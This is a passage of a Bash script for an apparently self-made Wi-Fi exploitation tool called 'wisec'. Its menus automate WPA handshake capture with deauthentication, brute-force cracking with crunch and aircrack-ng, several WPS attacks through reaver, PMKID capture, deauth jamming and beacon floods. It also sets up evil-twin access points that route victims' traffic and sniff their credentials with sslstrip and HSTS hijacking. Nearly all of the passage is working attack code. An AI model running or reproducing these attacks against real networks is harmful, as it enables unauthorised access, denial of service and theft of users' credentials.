echo -ne "${redColour}[!]${endColour} $opc Invalid Option\n" 389 | 390 | ;; 391 | 392 | esac 393 | 394 | 395 | done 396 | 397 | } 398 | 399 | 400 | function password_cracking_options(){ 401 | 402 | opc=0 403 | 404 | while [[ $opc -ne 3 ]]; do 405 | clear 406 | all_banners_menu 407 | 408 | echo -ne "${blueColour}[*]${endColor}${grayColour}Choose a way to crack you hash: ${endColour}" 409 | echo -ne "\n${blueColour}[1]${endColour} ${grayColour}Wordlist${endColour}\n" 410 | echo -ne "${blueColour}[2]${endColour} ${grayColour}Brute-Force${endColour}\n" 411 | echo -ne "${blueColour}[3]${endColour} ${grayColour}Back${endColour} \n" 412 | 413 | echo -ne "${blueColour}[3]${endColour} ${grayColour}Choose an option > ${endColour}" && read opc 414 | 415 | case $opc in 416 | 417 | 1) clear;dictionary_attack_pass;; 418 | 419 | 2) clear;crunch_options;; 420 | 421 | 3) clear;menu;; 422 | 423 | *) echo -ne "${redColour}[!]${endColour} $opc Invalid Option\n" 424 | 425 | ;; 426 | 427 | esac 428 | 429 | done 430 | 431 | } 432 | 433 | function dictionary_attack_pass(){ 434 | 435 | 436 | clear 437 | 438 | file_path_wpa="None" 439 | selected_dictionary="None" 440 | 441 | while [ $(test -f "$file_path"; echo $?) -ne 0 ] && [ $(test -f "$selected_dictionary"; echo $?) != 0 ];do 442 | clear 443 | all_banners_menu 444 | echo -e "${blueColour}[*]${endColour} ${grayColour}Pass the full path of your capture(WPA) file ${endColour}${blueColourColour}(${endColour}${grayColour}Example: /home/kali/wpa_capture${endColour}${blueColour})${endColour}" && read file_path_wpa 445 | 446 | echo -e "\n${blueColour}[*]${endColour}${grayColour} Pass the full path of the dictionary to use: ${endColour}" && read selected_dictionary 447 | done 448 | 449 | xterm -hold -e "aircrack-ng -w $selected_dictionary $file_path_wpa" & disown ;menu 450 | 451 | 452 | } 453 | 454 | 455 | 456 | function crunch_options(){ 457 | 458 | echo -ne "${blueColour}[*]${endColour}${grayColour}Pass the full path of the file to crack${endColour}${blueColour} (${endColour}${grayColour}Example: /home/kali/capture.cap${endColour}${blueColour})${endColour} : " 459 | read file_to_crack 460 | 461 | echo -ne "${greyColour}Minimum lenght${endColour}${blueColour} (${endColour}${grayColour}8-63${endColour}${blueColour})${endColour}: " 462 | read minimum_lenght 463 | echo -ne "${greyColour}Maximum length ${blueColour}(${endColour}${grayColour}8-63${endColour}${blueColour})${endColour}: " 464 | read maximum_lenght 465 | 466 | echo -ne "${greyColour}ESSID ${endColour}${blueColour}(${endColour}${greyColour}Example: wifi_name${endColour}${blueColour})${endColour}: " 467 | read essid_crunch 468 | crhn="None" 469 | clear 470 | while [ $crhn != "5" ] ; do 471 | 472 | clear 473 | all_banners_menu 474 | echo -ne "\n${blueColour}1)${endColour} ${grayColour}Uppercase + Lowercase + numbers${endColour}\n" 475 | echo -ne "${blueColour}2)${endColour} ${grayColour}Uppercase + Lowercase${endColour}\n" 476 | echo -ne "${blueColour}3)${endColour} ${grayColour}Numbers${endColour}\n" 477 | echo -ne "${blueColour}4)${endColour} ${grayColour}Uppercase${endColour}\n" 478 | echo -ne "${blueColour}5)${endColour} ${grayColour}Lowercase${endColour}\n" 479 | 480 | 481 | echo -ne "${blueColour}6)${endColour} ${grayColour}Back to Menu${endColour}\n" 482 | echo -ne "${yellowColour}[>]${endColour}${grayColour}Select an option: ${endColour}" 483 | 484 | 485 | read crhn 486 | 487 | case $crhn in 488 | 489 | 490 | 1)clear; sleep 4 491 | xterm -hold -e "crunch $minimum_lenght $maximum_lenght abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ | aircrack-ng -w - $file_to_crack -e $essid_crunch" & disown ;menu 492 | ;; 493 | 2)clear; sleep 4 494 | xterm -hold -e "crunch $minimum_lenght $maximum_lenght abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ | aircrack-ng -w - $file_to_crack -e $essid_crunch" & disown ;menu 495 | ;; 496 | 3)clear;sleep 4 497 | xterm -hold -e "crunch $minimum_lenght $maximum_lenght 1234567890 | aircrack-ng -w - $file_to_crack -e $essid_crunch" & diswon;menu 498 | ;; 499 | 4)clear; sleep 4 500 | 501 | xterm -hold -e "crunch $minimum_lenght $maximum_lenght ABCDEFGHIJKLMNOPQRSTUVWXYZ | aircrack-ng -w - $file_to_crack -e $essid_crunch" & disown;menu 502 | 503 | ;; 504 | 5)clear; sleep 4 505 | 506 | xterm -hold -e "crunch $minimum_lenght $maximum_lenght abcdefghijklmnopqrstuvwxyz | aircrack-ng -w - $file_to_crack $essid_crunch " & diswon;menu 507 | ;; 508 | 509 | 6)clear 510 | menu 511 | ;; 512 | 513 | *) echo "${redColour}[!]${endColour}${grayColour}$opc Is An Invalid Option${endColour}\n" 514 | 515 | ;; 516 | 517 | esac 518 | 519 | done 520 | 521 | clear 522 | } 523 | 524 | 525 | ################################################## Mac Chnager func ################################################## 526 | function mac_changer_func(){ 527 | 528 | clear 529 | all_banners_menu 530 | 531 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} Changing the current MAC address...${endColour}" 532 | ifconfig iw_wisecmon down 533 | macchanger -a iw_wisecmon > /dev/null 2>&1 534 | ifconfig iw_wisecmon up 535 | echo -ne "\n${blueColour}[*]${endColour}${greenColour} MAC Changed Successfully !!${endColour}" 536 | 537 | sleep 2 538 | 539 | } 540 | 541 | ################################################## Main Menu ################################################## 542 | function menu(){ 543 | 544 | opc=0 545 | 546 | 547 | while [[ $opc != 5 ]];do 548 | clear 549 | wisec_banner 550 | 551 | Current_mac=$(macchanger iw_wisecmon --show | head -n 1 | awk '{print $3}') 552 | Permanent_mac=$(macchanger iw_wisecmon --show | tail -n 1 | awk '{print $3}') 553 | echo -ne "\n${blueColour}[${endColour}${greenColour}+${endColour}${blueColour}]${endColour}${grayColour} Your Permanent MAC address: ${endColour} ${yellowColour}$Permanent_mac ${endColour}\n" 554 | echo -ne "${blueColour}[${endColour}${greenColour}+${endColour}${blueColour}]${endColour}${grayColour} Your Current MAC address: ${endColour} ${yellowColour}$Current_mac ${endColour}\n" 555 | echo -ne "\n" 556 | 557 | echo -ne "${blueColour}[1] ${endColour}${grayColour}Handshake (WPA/WPA2 - PSK)${endColour} ${blueColour}[12]${endColour}${grayColour} ChopChop Attack${endColour}\n" 558 | echo -ne "${blueColour}[2] ${endColour}${grayColour}Passive Handshake Capture${endColour} ${blueColour}[13]${endColour}${grayColour} Mac Changer${endColour}\n" 559 | echo -ne "${blueColour}[3]${endColour} ${grayColour}PMKID attack${endColour} ${blueColour}[14]${endColour}${grayColour} Evil_twin${endColour}\n" 560 | echo -ne "${blueColour}[4] ${endColour}${grayColour}Offline Cracking${endColour} ${blueColour}[15]${endColour}${grayColour} Quit${endColour}\n" 561 | 562 | echo -ne "${blueColour}[5]${endColour} ${grayColour}Constant Deauth Attack (Jamming)${endColour}\n" 563 | 564 | echo -ne "${blueColour}[6]${endColour} ${grayColour}Beacon Flood Attack${endColour}\n" 565 | 566 | echo -ne "${blueColour}[7] ${endColour}${grayColour}WPS Brute-force${endColour}\n" 567 | 568 | echo -ne "${blueColour}[8] ${endColour}${grayColour}Null Pin attack${endColour}\n" 569 | 570 | echo -ne "${blueColour}[9]${endColour}${grayColour} Pixie Dust ${endColour}\n" 571 | 572 | echo -ne "${blueColour}[10]${endColour}${grayColour} CaffeLatte${endColour}\n" 573 | 574 | echo -ne "${blueColour}[11]${endColour}${grayColour} Auth DoS${endColour}\n" 575 | echo -ne "\n" 576 | echo -ne "${turquoiseColour}[${endColour}${yellowColour}wisec${endColour}${turquoiseColour}]${endColour}${grayColour} Select an option >> ${endColour}" 577 | read opc 578 | 579 | case $opc in 580 | 581 | 1)clear 582 | handshake 583 | sleep 1.5 584 | ;; 585 | 586 | 2)clear 587 | passive_handshake 588 | sleep 1.5 589 | ;; 590 | 591 | 592 | 593 | 3)clear 594 | pmkid_attack 595 | sleep 1.5 596 | ;; 597 | 598 | 4)clear 599 | password_cracking_options 600 | sleep 1.5 601 | ;; 602 | 603 | 5)clear 604 | constant_deauth_attack 605 | sleep 1.5 606 | ;; 607 | 608 | 6)clear 609 | Beacon_Flood_attack_menu 610 | sleep 1.5 611 | ;; 612 | 613 | 614 | 7)clear 615 | wps_bruteforce 616 | sleep 1.5 617 | ;; 618 | 619 | 620 | 8)clear 621 | null_pin_attack 622 | sleep 1.5 623 | ;; 624 | 625 | 626 | 627 | 9)clear 628 | pixie_dust 629 | sleep 1.5 630 | ;; 631 | 632 | 633 | 634 | 10) 635 | 636 | CaffeLatte 637 | sleep 1.5 638 | ;; 639 | 640 | 641 | 11) 642 | 643 | authentication_attack 644 | sleep 1.5 645 | ;; 646 | 647 | 648 | 649 | 12)clear 650 | 651 | ChopChop_attack 652 | 653 | sleep 1.5 654 | ;; 655 | 656 | 13)clear 657 | mac_changer_func 658 | sleep 1.5 659 | ;; 660 | 661 | 662 | 14)clear 663 | evil_twin_options 664 | sleep 1.5 665 | ;; 666 | 667 | 15) 668 | echo -ne "\n\t${greenColour}Bye, bye :)${endColour}\n" 669 | tput cnorm; airmon-ng stop iw_wisecmon > /dev/null 2>&1 670 | ifconfig iw_wisec down 671 | ip link set iw_wisec name $networkCard 672 | ifconfig $networkCard up 673 | rm -r 1 iface.txt dnsmasq.conf hostapd.conf > /dev/null 2>&1 674 | #clear iptables 675 | iptables -P INPUT ACCEPT 676 | iptables -P FORWARD ACCEPT 677 | iptables -P OUTPUT ACCEPT 678 | iptables -t nat -F 679 | iptables -t mangle -F 680 | iptables -F 681 | iptables -X 682 | echo 0 > /proc/sys/net/ipv4/ip_forward 683 | sleep 1.5;exit 0 684 | ;; 685 | 686 | *) echo "${redColour}[!]${endColour}${grayColour}$opc Is An Invalid Option${endColour}\n" 687 | 688 | ;; 689 | 690 | esac 691 | 692 | 693 | done 694 | 695 | } 696 | 697 | ################################################## WPS Brute-Force ################################################## 698 | 699 | function wps_bruteforce(){ 700 | clear 701 | 702 | #wash recon 703 | 704 | xterm -hold -e "wash -i iw_wisecmon " & 705 | 706 | 707 | xterm_wash_recon_PID=$! 708 | 709 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} BSSID of the Access Point: ${endColour}" && read BSSID_WPS 710 | 711 | kill -9 $xterm_wash_recon_PID 2>/dev/null 712 | 713 | clear 714 | 715 | 716 | xterm -hold -e "reaver -i iw_wisecmon -b ${BSSID_WPS} -S -vv -L -N -T .5 -r 3:15" & disown 717 | 718 | sleep 15;echo -ne "\n${blueColour}[+]${endColour}${grayColour} Let the attack run for a while...${endColour}${redColour} it can take several hours${endColour}\n" 719 | clear 720 | 721 | 722 | menu 723 | 724 | } 725 | 726 | ################################################## WPS Pixie Dust ################################################## 727 | 728 | function pixie_dust(){ 729 | 730 | clear 731 | 732 | xterm -hold -e "wash -i iw_wisecmon" & 733 | 734 | xterm_wash_PID=$! 735 | 736 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} BSSID of the Access Point: ${endColour}" && read BSSID_WPS 737 | 738 | kill -9 $xterm_wash_PID 2>/dev/null 739 | 740 | clear 741 | 742 | 743 | xterm -hold -e "reaver -i iw_wisecmon -b ${BSSID_WPS} -K" & disown 744 | 745 | sleep 10;echo -ne "\n${blueColour}[+]${endColour}${grayColour} Let the attack run for a while...${endColour}\n" 746 | clear 747 | 748 | 749 | menu 750 | 751 | 752 | } 753 | 754 | 755 | ################################################## WPS Null Pin Attack ################################################## 756 | 757 | 758 | function null_pin_attack(){ 759 | 760 | clear 761 | 762 | xterm -hold -e "wash -i iw_wisecmon" & 763 | 764 | xterm_wash_PID=$! 765 | 766 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} BSSID of the Access Point: ${endColour}" && read BSSID_WPS 767 | 768 | kill -9 $xterm_wash_PID 2>/dev/null 769 | 770 | clear 771 | 772 | 773 | xterm -hold -e "reaver -i iw_wisecmon -b ${BSSID_WPS} -p '' -N" & disown 774 | 775 | sleep 10;echo -ne "\n${blueColour}[+]${endColour}${grayColour} Let the attack run for a while...${endColour}\n" 776 | clear 777 | 778 | 779 | menu 780 | } 781 | 782 | ################################################## Passive Handshake func ################################################## 783 | 784 | function passive_handshake(){ 785 | 786 | 787 | all_banners_menu 788 | 789 | mkdir passive_handshake > /dev/null 2>&1 790 | 791 | pushd passive_handshake > /dev/null 2>&1 792 | 793 | xterm -hold -e "airodump-ng iw_wisecmon" & 794 | 795 | airodump_xterm_PID=$! 796 | 797 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} Access Point Name: ${endColour}" && read APessid 798 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} Access Point Channel: ${endColour}" && read Channel 799 | 800 | kill -9 $airodump_xterm_PID 801 | wait $airodump_xterm_PID 2>/dev/null 802 | 803 | xterm -hold -e "airodump-ng -c $Channel -w ${APessid} --essid $APessid iw_wisecmon" & 804 | cd ../ 805 | 806 | echo -ne "\n${blueColour}[*] ${endColour}${grayColour}When you finish with getting the handshake, you have a directory called 'passive_handshake/' with all the captures${grayColour}" 807 | sleep 4 808 | 809 | menu 810 | 811 | } 812 | 813 | ################################################## Monitor mode validator ################################################## 814 | 815 | function monitor_mode_verification(){ 816 | 817 | ## validating interface 818 | ip a > ifaces.txt 819 | 820 | checker=0;while [ $checker -ne 1 ];do 821 | 822 | for interface in $(cat ifaces.txt | cut -b 1-20| awk '{print $2}' | grep ':' | tr -d ':');do 823 | 824 | if [ "$networkCard" == "$interface" ];then 825 | 826 | checker=1 827 | 828 | fi 829 | 830 | done; if [ $checker -eq 0 ];then echo -ne "${redColour}[!] The Interface is not valid, exiting...${endColour}";exit 1; fi 831 | 832 | done 833 | rm -r ifaces.txt 834 | 835 | ifconfig $networkCard down 836 | ip link set $networkCard name iw_wisec 837 | ifconfig iw_wisec up 838 | clear 839 | 840 | if [ $(iwconfig | grep iw_wisec | grep 'Monitor' > /dev/null 2&>1; echo $?) -ne 0 ];then 841 | clear 842 | 843 | airmon-ng start iw_wisec > /dev/null 2>&1 844 | sleep 2.5 845 | iwconfig iw_wisec > iface.txt 846 | 847 | if [ $(cat iface.txt | grep Mode | tr ':' ' ' | awk '{print $2}') == 'Monitor' ];then 848 | 849 | echo -ne "${greenColour}[+]${endColour} ${grayColour}The interface has been successfully put on monitor mode${endColor}" 850 | rm -r iface.txt 851 | 852 | fi 853 | fi 854 | tput cnorm 855 | clear 856 | 857 | } 858 | 859 | 860 | 861 | function pmkid_attack(){ 862 | 863 | all_banners_menu 864 | 865 | mkdir PMKID > /dev/null 2>&1 866 | 867 | pushd PMKID > /dev/null 2>&1 868 | 869 | 870 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} How much time you want to wait in seconds (60 - 1min): ${endColour}" && read time_pmkid 871 | echo -ne "\n${redColour}[!]${endColour} ${grayColour}Please wait $time_pmkid seconds${endColour}\n" 872 | 873 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} Starting attack...${endColour}\n" 874 | 875 | 876 | systemctl stop NetworkManager.service 877 | systemctl stop wpa_supplicant.service 878 | 879 | xterm -hold -e "hcxdumptool -i iw_wisecmon -o dumpfile.pcapng --active_beacon --enable_status=15" & 880 | hcxdumptool_xterm_PID=$! 881 | 882 | 883 | sleep $time_pmkid; kill -9 $hcxdumptool_xterm_PID 884 | wait $hcxdumptool_xterm_PID 2>/dev/null 885 | 886 | systemctl start NetworkManager.service 887 | systemctl start wpa_supplicant.service 888 | hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng 889 | clear 890 | 891 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} Your PMKID files are saved in the 'PMKID' directory, the files are ready to be cracked with hashcat${endColour}" 892 | sleep 5 893 | cd ../ 894 | menu 895 | 896 | } 897 | 898 | function handshake(){ 899 | 900 | 901 | if [ $(iwconfig | grep iw_wisec | grep 'Monitor' > /dev/null 2&>1; echo $?) -ne 0 ];then 902 | clear 903 | ## if monitor mode was on 904 | all_banners_menu 905 | 906 | xterm -hold -e "airodump-ng iw_wisecmon" & 907 | 908 | airodump_xterm_PID=$! 909 | 910 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} Access Point Name: ${endColour}" && read APessid 911 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} Access Point Channel: ${endColour}" && read Channel 912 | 913 | kill -9 $airodump_xterm_PID 914 | wait $airodump_xterm_PID 2>/dev/null 915 | xterm -hold -e "airodump-ng -c $Channel -w ${APessid} --essid $APessid iw_wisecmon" & 916 | 917 | airodump_filter_xterm_PID=$! 918 | 919 | sleep 10; xterm -hold -e "aireplay-ng -0 5 -e ${APessid} -c 'FF:FF:FF:FF:FF:FF' iw_wisecmon" & 920 | 921 | aireplay_xterm_PID=$! 922 | sleep 10; kill -9 $aireplay_xterm_PID; wait $aireplay_xterm_PID 2>/dev/null 923 | 924 | sleep 15; kill -9 $airodump_filter_xterm_PID 925 | wait $airodump_filter_xterm_PID 2>/dev/null 926 | clear 927 | 928 | ## Validating hasdshake with aircrack-ng 929 | aircrack_valid=$(aircrack-ng *.cap | awk '{print $5}' | tr '\n' ' ' | tr -d '(' | awk '{print $1}') 930 | if [ $aircrack_valid -eq "1" ]; then 931 | clear 932 | all_banners_menu 933 | echo -ne "\n${greenColour}[*] Handshake of $APessid has been Successfully captured !!!${endColour}\n" 934 | mkdir Captures 2>/dev/null 935 | 936 | echo -ne "\n${blueColour}[+]${endColour}${grayColour} Capture directory has been created${endColour}\n" 937 | mv $APessid*.cap Captures/$APessid-handshake.cap 2>/dev/null 938 | rm -r ${APessid}*.* 939 | filepath=$(find $(pwd) -name $APessid-handshake.cap 2>/dev/null) 940 | 941 | echo -ne "\n${blueColour}[*]${endColour} ${grayColour}File Path: $filepath${endColour}\n" 942 | sleep 7 943 | 944 | # WPA cracking aircrack + crunch 945 | cracking_pass 946 | 947 | else 948 | 949 | clear 950 | echo -ne "\n${redColour}[!] Handshake has not been captured....${endColour}\n" 951 | sleep 3 952 | clear;menu 953 | 954 | fi 955 | 956 | fi 957 | tput cnorm 958 | } 959 | 960 | 961 | function Beacon_Flood_attack_menu(){ 962 | 963 | opt_b=0 964 | 965 | while [[ $opt_b -ne 3 ]];do 966 | clear 967 | all_banners_menu 968 | 969 | echo -ne "\n${blueColour}[1]${endColour}${grayColour} Use a ssid text list${endColour}\n" 970 | echo -ne "${blueColour}[2]${endColour} ${grayColour}Just do the Beacon Flood attack with random characters${endColour}\n" 971 | echo -ne "${blueColour}[3]${endColour}${grayColour} back${endColour}\n" 972 | echo -ne "\n${yellowColour}[>]${endColour}${grayColour} Choose an option > ${endColour}" && read opc 973 | 974 | case $opc in 975 | 976 | 1) 977 | echo -ne "${blueColour}[${endColour}${grayColour}*${endColour}${blueColour}]${endColour} ${grayColour}Pass the the name of the custom ssid file: ${endColour}" && read ssid_list; 978 | 979 | xterm -hold -e "mdk3 iw_wisecmon b -a -g -f $ssid_list" & 980 | break 981 | menu 982 | ;; 983 | 984 | 2) 985 | 986 | xterm -hold -e "mdk3 iw_wisecmon b -a -w nta -m" & 987 | break 988 | menu 989 | ;; 990 | 991 | 3) 992 | 993 | menu 994 | ;; 995 | 996 | *) 997 | echo -ne "${redColour}[!]${endColour} $opc Invalid Option\n" 998 | ;; 999 | esac 1000 | done 1001 | } 1002 | 1003 | function constant_deauth_attack(){ 1004 | 1005 | xterm -hold -e "airodump-ng iw_wisecmon" & 1006 | airodump_xterm_PID=$! 1007 | 1008 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} Access Point Name: ${endColour}" && read APessid 1009 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} Access Point Channel: ${endColour}" && read Channel 1010 | 1011 | kill -9 $airodump_xterm_PID 1012 | wait $airodump_xterm_PID 2>/dev/null 1013 | 1014 | xterm -hold -e "airodump-ng -c $Channel -w ${APessid} --essid $APessid iw_wisecmon" & 1015 | 1016 | airodump_filter_xterm_PID=$! 1017 | 1018 | sleep 10; xterm -hold -e "aireplay-ng -0 0 -e ${APessid} -c 'FF:FF:FF:FF:FF:FF' iw_wisecmon" & 1019 | 1020 | clear 1021 | 1022 | } 1023 | 1024 | function evilap(){ 1025 | clear 1026 | all_banners_menu 1027 | 1028 | xterm -hold -e "airodump-ng iw_wisecmon" & 1029 | xterm_airodump_PID=$! 1030 | 1031 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} Set evil ap name: ${endColour}" && read ap_name 1032 | echo -ne "${blueColour}[*]${endColour} ${grayColour}Set evil AP channel: ${endColour}" && read channel 1033 | echo -ne "${blueColour}[*]${endColour}${grayColour} Set your internet interface (Ex. eth0, enp0s3, etc): ${endColour}" && read internet_interface 1034 | 1035 | kill -9 $xterm_airodump_PID 1036 | 1037 | #hostapd config 1038 | echo -e "interface=iw_wisecmon" > hostapd.conf 1039 | echo -e "driver=nl80211" >> hostapd.conf 1040 | echo -e "ssid=$ap_name" >> hostapd.conf 1041 | echo -e "hw_mode=g" >> hostapd.conf 1042 | echo -e "channel=$channel" >> hostapd.conf 1043 | echo -e "macaddr_acl=0" >> hostapd.conf 1044 | echo -e "auth_algs=1" >> hostapd.conf 1045 | echo -e "ignore_broadcast_ssid=0" >> hostapd.conf 1046 | 1047 | xterm -T "Hostapd Started" -hold -e "hostapd hostapd.conf" & 1048 | 1049 | echo -e "[+] Hostapd started" 1050 | 1051 | # Config interface 1052 | ifconfig iw_wisecmon 10.0.0.1 netmask 255.255.255.0 1053 | 1054 | echo -e "[+] Interface ip & netmask configured" 1055 | 1056 | #dnsmasq 1057 | echo -e "interface=iw_wisecmon" >> dnsmasq.conf 1058 | echo -e "dhcp-range=10.0.0.10,10.0.0.25,255.255.255.0,12h" >> dnsmasq.conf 1059 | echo -e "dhcp-option=3,10.0.0.1" >> dnsmasq.conf 1060 | echo -e "dhcp-option=6,10.0.0.1" >> dnsmasq.conf 1061 | echo -e "server=8.8.8.8" >> dnsmasq.conf 1062 | echo -e "log-queries" >> dnsmasq.conf 1063 | echo -e "log-dhcp" >> dnsmasq.conf 1064 | echo -e "listen-address=127.0.0.1" >> dnsmasq.conf 1065 | 1066 | xterm -geometry 50x50+100+300 -T "Dnsmasq Started" -hold -e "dnsmasq -C dnsmasq.conf -d" & 1067 | 1068 | echo -e "[+] Dnsmasq started" 1069 | 1070 | #routing table 1071 | 1072 | route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 1073 | 1074 | # Ip tables (Activate internet) 1075 | iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE 1076 | iptables --append FORWARD --in-interface iw_wisecmon -j ACCEPT 1077 | 1078 | # forward packets to internet 1079 | echo 1 > /proc/sys/net/ipv4/ip_forward 1080 | 1081 | echo -e "[+] Iptables set" 1082 | 1083 | 1084 | } 1085 | 1086 | 1087 | 1088 | 1089 | 1090 | function eviltwin_and_sniffing(){ 1091 | clear 1092 | all_banners_menu 1093 | 1094 | xterm -hold -e "airodump-ng iw_wisecmon" & 1095 | xterm_airodump_PID=$! 1096 | 1097 | 1098 | echo -ne "\n${blueColour}[*]${endColour}${grayColour} Set evil ap name: ${endColour}" && read ap_name 1099 | echo -ne "${blueColour}[*]${endColour} ${grayColour}Set evil AP channel: ${endColour}" && read channel 1100 | echo -ne "${blueColour}[*]${endColour}${grayColour} Set your internet interface (Ex. eth0, enp0s3, etc): ${endColour}" && read internet_interface 1101 | 1102 | kill -9 $xterm_airodump_PID 1103 | 1104 | #hostapd config 1105 | echo -e "interface=iw_wisecmon" > hostapd.conf 1106 | echo -e "driver=nl80211" >> hostapd.conf 1107 | echo -e "ssid=$ap_name" >> hostapd.conf 1108 | echo -e "hw_mode=g" >> hostapd.conf 1109 | echo -e "channel=$channel" >> hostapd.conf 1110 | echo -e "macaddr_acl=0" >> hostapd.conf 1111 | echo -e "auth_algs=1" >> hostapd.conf 1112 | echo -e "ignore_broadcast_ssid=0" >> hostapd.conf 1113 | 1114 | xterm -T "Hostapd Started" -hold -e "hostapd hostapd.conf" & 1115 | 1116 | echo -e "[+] Hostapd started" 1117 | 1118 | # Config interface 1119 | ifconfig iw_wisecmon 10.0.0.1 netmask 255.255.255.0 1120 | 1121 | echo -e "[+] Interface ip & netmask configured" 1122 | 1123 | #dnsmasq 1124 | echo -e "interface=iw_wisecmon" >> dnsmasq.conf 1125 | echo -e "dhcp-range=10.0.0.10,10.0.0.25,255.255.255.0,12h" >> dnsmasq.conf 1126 | echo -e "dhcp-option=3,10.0.0.1" >> dnsmasq.conf 1127 | echo -e "dhcp-option=6,10.0.0.1" >> dnsmasq.conf 1128 | echo -e "server=8.8.8.8" >> dnsmasq.conf 1129 | echo -e "log-queries" >> dnsmasq.conf 1130 | echo -e "log-dhcp" >> dnsmasq.conf 1131 | echo -e "listen-address=127.0.0.1" >> dnsmasq.conf 1132 | 1133 | xterm -geometry 50x50+100+300 -T "Dnsmasq Started" -hold -e "dnsmasq -C dnsmasq.conf -d" & 1134 | 1135 | 1136 | echo -e "[+] Dnsmasq started" 1137 | 1138 | #routing table 1139 | 1140 | route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 1141 | 1142 | # Ip tables (Activate internet) 1143 | iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE 1144 | iptables --append FORWARD --in-interface iw_wisecmon -j ACCEPT 1145 | 1146 | # forward packets to internet 1147 | echo 1 > /proc/sys/net/ipv4/ip_forward 1148 | 1149 | echo -e "[+] Iptables set" 1150 | 1151 | echo -e "[+] sniffing ..." 1152 | 1153 | # sniffing 1154 | xterm -T "Bettercap (Sniffing)" -hold -e "bettercap -iface iw_wisecmon -eval 'net.probe on; net.recon on; net.sniff on;set http.proxy.sslstrip true;hstshijack/hstshijack'" & 1155 | 1156 | 1157 | } 1158 | 1159 | function evil_twin_options(){ 1160 | 1161 | opt_b=0 1162 | 1163 | while [[ $opt_b -ne 3 ]];do 1164 | clear 1165 | all_banners_menu 1166 | 1167 | echo -ne "\n${yellowColour}[*]${endColour}${grayColour}Tools for Eviltwin Attacks:${endColour}" 1168 | echo -ne "\n${blueColour}[1]${endColour}${grayColour} Fluxion${endColour}\n" 1169 | echo -ne "${blueColour}[2]${endColour}${grayColour} Wifiphisher${endColour}\n" 1170 | echo -ne "${blueColour}[3]${endColour}${grayColour} Wifipumpkin3${endColour}\n" 1171 | 1172 | echo -ne "\n${yellowColour}[*]${endColour}${grayColour}Evil Twin Attack Options:${endColour}\n" 1173 | echo -ne "${blueColour}[4]${endColour} ${grayColour}Evil ap + sniffing with sslstrip/hstshijacking (Get credentials from packets and spy users)${endColour}\n" 1174 | echo -ne "${blueColour}[5]${endColour} ${grayColour}Just Evil AP ${endColour}\n" 1175 | echo -ne "${blueColour}[6] ${endColour}${grayColour}Back${endColour}\n" 1176 | 1177 | echo -ne "\n${yellowColour}[>]${endColour}${grayColour} Choose an option > ${endColour}" && read opc 1178 | 1179 | case $opc in 1180 | 1181 | 1) 1182 | 1183 | pushd /opt/fluxion > /dev/null 2>&1 1184 | xterm -hold -e "cd /opt/fluxion/; /opt/fluxion/fluxion.sh" & 1185 | popd > /dev/null 2>&1 1186 | break 1187 | menu 1188 | ;; 1189 | 1190 | 2) 1191 | 1192 | xterm -hold -e "sudo wifiphisher" & 1193 | 1194 | 1195 | break 1196 | menu 1197 | ;; 1198 | 1199 | 3) 1200 | 1201 | 1202 | xterm -hold -e "sudo wifipumpkin3" & 1203 | ;; 1204 | 1205 | 1206 | 4) 1207 | #eviltwinopt 1208 | eviltwin_and_sniffing 1209 | ;; 1210 | 1211 | 1212 | 5) 1213 | evilap 1214 | ;; 1215 | 1216 | 6) 1217 | menu 1218 | ;; 1219 | 1220 | *) 1221 | echo -ne "${redColour}[!]${endColour} $opc Invalid Option\n" 1222 | ;; 1223 | esac 1224 | done 1225 | 1226 | 1227 | 1228 | } 1229 | 1230 | 1231 | 1232 | function qhelppanel(){ 1233 | 1234 | echo -ne "${redColour}██╗ ██╗██╗███████╗███████╗ ██████╗${endColour}\n" 1235 | echo -ne "${redColour}██║ ██║██║██╔════╝██╔════╝██╔════╝${endColour}\n" 1236 | echo -ne "${redColour}██║ █╗ ██║██║███████╗█████╗ ██║ ${endColour}\n" 1237 | echo -ne "${redColour}██║███╗██║██║╚════██║██╔══╝ ██║ ${endColour}\n" 1238 | echo -ne "${redColour}╚███╔███╔╝██║███████║███████╗╚██████╗${endColour}\n" 1239 | echo -ne "${redColour} ╚══╝╚══╝ ╚═╝╚══════╝╚══════╝ ╚═════╝${endColour}\n" 1240 | 1241 | 1242 | echo -ne "${yellowColour}[${endColour}${blueColour}wisec${endColour}${yellowColour}]${endColour} ${blueColour}WI-FI Explotation Tool${endColour}\n" 1243 | 1244 | 1245 | echo -ne "\t\n${yellowColour}[>]${endColour}${grayColour} Usage: ./wisec -n ${endColour}" 1246 | } 1247 | 1248 | 1249 | function dependencies(){ 1250 | 1251 | ## checking dependencies 1252 | dependencies=(bettercap wifipumpkin3 aircrack-ng macchanger mdk4 mdk3 xterm hcxdumptool crunch wash reaver wifiphisher git php-cgi) 1253 | 1254 | echo -ne "${purpleColour}[*] ${endColour}${blueColour}Checking dependencies${endColour}\n" 1255 | 1256 | sleep 2 1257 | 1258 | for program in "${dependencies[@]}"; do 1259 | echo -ne "${grayColour}\n[*] $program ${endColour}" 1260 | test -f /usr/bin/$program 1261 | 1262 | if [ "$(echo $?)" == "0" ];then 1263 | 1264 | echo -e " ${greenColour}(Installed)${endColour}" 1265 | else 1266 | 1267 | echo -e "\n[*] Installing $program\n" 1268 | apt-get install $program -y > /dev/null 2>&1 1269 | 1270 | 1271 | fi; sleep 1 1272 | 1273 | done 1274 | 1275 | clear 1276 | 1277 | fluxion_check=$(find /opt/fluxion 